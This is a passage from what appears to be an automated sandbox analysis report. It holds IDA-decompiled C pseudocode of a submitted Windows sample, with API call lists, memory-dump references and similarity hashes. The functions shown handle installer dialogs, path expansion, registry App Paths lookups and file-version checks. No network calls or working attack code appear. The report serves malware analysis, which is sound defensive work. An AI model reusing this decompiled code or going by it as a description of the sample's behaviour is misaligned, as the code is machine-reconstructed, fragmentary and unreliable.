                                                                                                                                                                                                    					if(_t22 <= 7) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						EndDialog(_a4, _t22);
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 != 0x839) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x3991dc = 1;
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00393459
                                                                                                                                                                                                    0x0039345c
                                                                                                                                                                                                    0x003934d8
                                                                                                                                                                                                    0x003934de
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003934e0
                                                                                                                                                                                                    0x0039345e
                                                                                                                                                                                                    0x00393463
                                                                                                                                                                                                    0x0039349a
                                                                                                                                                                                                    0x003934a0
                                                                                                                                                                                                    0x003934a7
                                                                                                                                                                                                    0x003934b2
                                                                                                                                                                                                    0x003934c4
                                                                                                                                                                                                    0x003934cb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003934cb
                                                                                                                                                                                                    0x00393468
                                                                                                                                                                                                    0x0039346e
                                                                                                                                                                                                    0x00393474
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039347c
                                                                                                                                                                                                    0x0039348c
                                                                                                                                                                                                    0x00393490
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393496
                                                                                                                                                                                                    0x00393484
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393486
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393486
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00393490
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0039349A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 003934B2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 003934C4
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 003934CB
                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 003934D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 852535152-432003757
                                                                                                                                                                                                    • Opcode ID: a148c3c82ab325352143f1a13220a0ac5fe4f830ae343444439ea0368aed1d0f
                                                                                                                                                                                                    • Instruction ID: 28c865bf0e744a733818153d94b358befc82f93a6692e58191e51ebb609e1b37
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a148c3c82ab325352143f1a13220a0ac5fe4f830ae343444439ea0368aed1d0f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD01D472240514ABCF275F6ADC0C97E3B68EB09700F134126F956869A0CB329F42CBC5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E00392AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				char _t32;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				char* _t38;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                    				CHAR* _t59;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t60 = __edx;
                                                                                                                                                                                                    				_t16 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                    				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                    				_t65 = _a4;
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t64 = __ecx;
                                                                                                                                                                                                    				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                    					GetModuleFileNameA( *0x399a3c,  &_v268, 0x104);
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_t17 =  *_t64;
                                                                                                                                                                                                    						if(_t17 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                    						 *_t65 =  *_t64;
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t65[1] = _t64[1];
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *_t64 != 0x23) {
                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                    							_t65 = CharNextA(_t65);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 = CharNextA(_t64);
                                                                                                                                                                                                    							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                    								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                    									if( *_t64 == 0x23) {
                                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00391680(_t65, E003917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    									_t52 = _t65;
                                                                                                                                                                                                    									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                    									_t60 = _t14;
                                                                                                                                                                                                    									do {
                                                                                                                                                                                                    										_t32 =  *_t52;
                                                                                                                                                                                                    										_t52 =  &(_t52[1]);
                                                                                                                                                                                                    									} while (_t32 != 0);
                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								E003965E8( &_v268);
                                                                                                                                                                                                    								_t55 =  &_v268;
                                                                                                                                                                                                    								_t62 = _t55 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t34 =  *_t55;
                                                                                                                                                                                                    									_t55 = _t55 + 1;
                                                                                                                                                                                                    								} while (_t34 != 0);
                                                                                                                                                                                                    								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                    								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                    									 *_t38 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E00391680(_t65, E003917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    								_t59 = _t65;
                                                                                                                                                                                                    								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                    								_t60 = _t12;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t42 =  *_t59;
                                                                                                                                                                                                    									_t59 =  &(_t59[1]);
                                                                                                                                                                                                    								} while (_t42 != 0);
                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                    								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t64 = CharNextA(_t64);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *_t65 = _t17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00392aac
                                                                                                                                                                                                    0x00392ab7
                                                                                                                                                                                                    0x00392abc
                                                                                                                                                                                                    0x00392abe
                                                                                                                                                                                                    0x00392ac3
                                                                                                                                                                                                    0x00392ac6
                                                                                                                                                                                                    0x00392ac9
                                                                                                                                                                                                    0x00392ace
                                                                                                                                                                                                    0x00392ae6
                                                                                                                                                                                                    0x00392bdc
                                                                                                                                                                                                    0x00392bdc
                                                                                                                                                                                                    0x00392be0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392af2
                                                                                                                                                                                                    0x00392afc
                                                                                                                                                                                                    0x00392b00
                                                                                                                                                                                                    0x00392b05
                                                                                                                                                                                                    0x00392b05
                                                                                                                                                                                                    0x00392b0b
                                                                                                                                                                                                    0x00392bca
                                                                                                                                                                                                    0x00392bd1
                                                                                                                                                                                                    0x00392b11
                                                                                                                                                                                                    0x00392b18
                                                                                                                                                                                                    0x00392b26
                                                                                                                                                                                                    0x00392b99
                                                                                                                                                                                                    0x00392bc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392b9b
                                                                                                                                                                                                    0x00392bae
                                                                                                                                                                                                    0x00392bb3
                                                                                                                                                                                                    0x00392bb5
                                                                                                                                                                                                    0x00392bb5
                                                                                                                                                                                                    0x00392bb8
                                                                                                                                                                                                    0x00392bb8
                                                                                                                                                                                                    0x00392bba
                                                                                                                                                                                                    0x00392bbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392bb8
                                                                                                                                                                                                    0x00392b28
                                                                                                                                                                                                    0x00392b2e
                                                                                                                                                                                                    0x00392b33
                                                                                                                                                                                                    0x00392b39
                                                                                                                                                                                                    0x00392b3c
                                                                                                                                                                                                    0x00392b3c
                                                                                                                                                                                                    0x00392b3e
                                                                                                                                                                                                    0x00392b3f
                                                                                                                                                                                                    0x00392b55
                                                                                                                                                                                                    0x00392b5d
                                                                                                                                                                                                    0x00392b64
                                                                                                                                                                                                    0x00392b64
                                                                                                                                                                                                    0x00392b7a
                                                                                                                                                                                                    0x00392b7f
                                                                                                                                                                                                    0x00392b81
                                                                                                                                                                                                    0x00392b81
                                                                                                                                                                                                    0x00392b84
                                                                                                                                                                                                    0x00392b84
                                                                                                                                                                                                    0x00392b86
                                                                                                                                                                                                    0x00392b87
                                                                                                                                                                                                    0x00392bbf
                                                                                                                                                                                                    0x00392bc1
                                                                                                                                                                                                    0x00392bc1
                                                                                                                                                                                                    0x00392b26
                                                                                                                                                                                                    0x00392bda
                                                                                                                                                                                                    0x00392bda
                                                                                                                                                                                                    0x00392be6
                                                                                                                                                                                                    0x00392be6
                                                                                                                                                                                                    0x00392bf8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00392AE6
                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00392AF2
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00392B12
                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00392B1E
                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00392B55
                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00392BD4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                    • Opcode ID: 54b1e606e0ae0b8fbf5129ca598280574315115ea1072d5d7a08838623baca66
                                                                                                                                                                                                    • Instruction ID: 6df2adc247ed06cedfdd9871f4363eddb568629af2971d68c4e36d5d83d63293
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54b1e606e0ae0b8fbf5129ca598280574315115ea1072d5d7a08838623baca66
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C414535508A466FDF179F349C04AFE7BAD9F52300F1401DAE8C297202DB368E86CBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E003928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                    				long _t68;
                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                    				_t99 = __ecx;
                                                                                                                                                                                                    				_t106 = 0;
                                                                                                                                                                                                    				_v16 = __ecx;
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				_t103 = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_t106 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t62 = 0;
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                    						if(E00392773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t11 =  &_v32; // 0x393938
                                                                                                                                                                                                    						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                    						_v28 = _t68;
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_t99 = _v16;
                                                                                                                                                                                                    							_t70 = _v8 + _t99;
                                                                                                                                                                                                    							_t93 = _v24;
                                                                                                                                                                                                    							_t87 = _v20;
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                    								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                    								_v36 = _t73;
                                                                                                                                                                                                    								if(_t73 != 0) {
                                                                                                                                                                                                    									_t16 =  &_v32; // 0x393938
                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L19;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t79 = _v44;
                                                                                                                                                                                                    										_t88 = _t106;
                                                                                                                                                                                                    										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                    										_t101 = _v28;
                                                                                                                                                                                                    										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                    										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                    										_t97 = _v48;
                                                                                                                                                                                                    										_v36 = _t83;
                                                                                                                                                                                                    										_t109 = _t83;
                                                                                                                                                                                                    										do {
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00392A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00392A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                    											_t109 = _t109 + 0x18;
                                                                                                                                                                                                    											_t88 = _t88 + 4;
                                                                                                                                                                                                    										} while (_t88 < 8);
                                                                                                                                                                                                    										_t87 = _v20;
                                                                                                                                                                                                    										_t106 = 0;
                                                                                                                                                                                                    										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                    											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                    												GlobalUnlock(_t103);
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L15;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                    				 *_a8 = _t87;
                                                                                                                                                                                                    				if(_t103 != 0) {
                                                                                                                                                                                                    					GlobalFree(_t103);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t106;
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x003928f1
                                                                                                                                                                                                    0x003928f4
                                                                                                                                                                                                    0x003928f7
                                                                                                                                                                                                    0x003928f9
                                                                                                                                                                                                    0x003928fc
                                                                                                                                                                                                    0x003928ff
                                                                                                                                                                                                    0x00392901
                                                                                                                                                                                                    0x00392907
                                                                                                                                                                                                    0x00392a62
                                                                                                                                                                                                    0x00392a64
                                                                                                                                                                                                    0x0039290d
                                                                                                                                                                                                    0x0039290d
                                                                                                                                                                                                    0x0039290f
                                                                                                                                                                                                    0x00392912
                                                                                                                                                                                                    0x00392920
                                                                                                                                                                                                    0x00392937
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039293d
                                                                                                                                                                                                    0x00392944
                                                                                                                                                                                                    0x0039294a
                                                                                                                                                                                                    0x0039294f
                                                                                                                                                                                                    0x00392a2f
                                                                                                                                                                                                    0x00392a32
                                                                                                                                                                                                    0x00392a34
                                                                                                                                                                                                    0x00392a37
                                                                                                                                                                                                    0x00392a41
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392955
                                                                                                                                                                                                    0x0039295e
                                                                                                                                                                                                    0x00392962
                                                                                                                                                                                                    0x00392969
                                                                                                                                                                                                    0x0039296f
                                                                                                                                                                                                    0x00392974
                                                                                                                                                                                                    0x0039297e
                                                                                                                                                                                                    0x0039298c
                                                                                                                                                                                                    0x00392a20
                                                                                                                                                                                                    0x00392a21
                                                                                                                                                                                                    0x00392a27
                                                                                                                                                                                                    0x00392a4c
                                                                                                                                                                                                    0x00392a4f
                                                                                                                                                                                                    0x00392a50
                                                                                                                                                                                                    0x00392a53
                                                                                                                                                                                                    0x00392a56
                                                                                                                                                                                                    0x00392a5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003929b2
                                                                                                                                                                                                    0x003929b2
                                                                                                                                                                                                    0x003929b5
                                                                                                                                                                                                    0x003929bd
                                                                                                                                                                                                    0x003929c3
                                                                                                                                                                                                    0x003929cc
                                                                                                                                                                                                    0x003929d5
                                                                                                                                                                                                    0x003929d7
                                                                                                                                                                                                    0x003929da
                                                                                                                                                                                                    0x003929dd
                                                                                                                                                                                                    0x003929df
                                                                                                                                                                                                    0x003929ec
                                                                                                                                                                                                    0x003929f8
                                                                                                                                                                                                    0x003929fc
                                                                                                                                                                                                    0x003929ff
                                                                                                                                                                                                    0x00392a02
                                                                                                                                                                                                    0x00392a07
                                                                                                                                                                                                    0x00392a0a
                                                                                                                                                                                                    0x00392a0f
                                                                                                                                                                                                    0x00392a19
                                                                                                                                                                                                    0x00392a81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392a0f
                                                                                                                                                                                                    0x0039298c
                                                                                                                                                                                                    0x00392974
                                                                                                                                                                                                    0x00392962
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039294f
                                                                                                                                                                                                    0x00392912
                                                                                                                                                                                                    0x00392a65
                                                                                                                                                                                                    0x00392a68
                                                                                                                                                                                                    0x00392a6c
                                                                                                                                                                                                    0x00392a6f
                                                                                                                                                                                                    0x00392a6f
                                                                                                                                                                                                    0x00392a7d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00392A6F
                                                                                                                                                                                                      • Part of subcall function 00392773: CharUpperA.USER32(74C05EB4,00000000,00000000,00000000), ref: 003927A8
                                                                                                                                                                                                      • Part of subcall function 00392773: CharNextA.USER32(0000054D), ref: 003927B5
                                                                                                                                                                                                      • Part of subcall function 00392773: CharNextA.USER32(00000000), ref: 003927BC
                                                                                                                                                                                                      • Part of subcall function 00392773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392829
                                                                                                                                                                                                      • Part of subcall function 00392773: RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392852
                                                                                                                                                                                                      • Part of subcall function 00392773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392870
                                                                                                                                                                                                      • Part of subcall function 00392773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003928A0
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00393938,?,?,?,?,-00000005), ref: 00392958
                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00392969
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00393938,?,?,?,?,-00000005,?), ref: 00392A21
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00393938,?,?), ref: 00392A81
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                    • String ID: 899
                                                                                                                                                                                                    • API String ID: 3949799724-2226677896
                                                                                                                                                                                                    • Opcode ID: 7d72817b921b40c2e599ed0a23b48bcd7889c40a582234ddfa6d4536cbcfebfe
                                                                                                                                                                                                    • Instruction ID: bf7a2c78d06e83f251fac8462fb423496abb8c7954ef8c30a40de17c00c795f0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d72817b921b40c2e599ed0a23b48bcd7889c40a582234ddfa6d4536cbcfebfe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00512932E00619EFCF26DF98C884AAEBBB9FF48700F15412AE905E7211DB319951DB94
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E003943D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                                                                                    				struct tagRECT _v40;
                                                                                                                                                                                                    				struct HWND__* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				int _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				struct HWND__* _t63;
                                                                                                                                                                                                    				struct HWND__* _t67;
                                                                                                                                                                                                    				struct HWND__* _t68;
                                                                                                                                                                                                    				struct HDC__* _t69;
                                                                                                                                                                                                    				int _t72;
                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t63 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                    				_t68 = __edx;
                                                                                                                                                                                                    				_v44 = __ecx;
                                                                                                                                                                                                    				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                    				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                    				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                    				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                    				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                    				_t69 = GetDC(_v44);
                                                                                                                                                                                                    				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                    				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                    				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                    				_t56 = _v48;
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                    				_t67 = 0;
                                                                                                                                                                                                    				if(_t72 >= 0) {
                                                                                                                                                                                                    					_t63 = _v52;
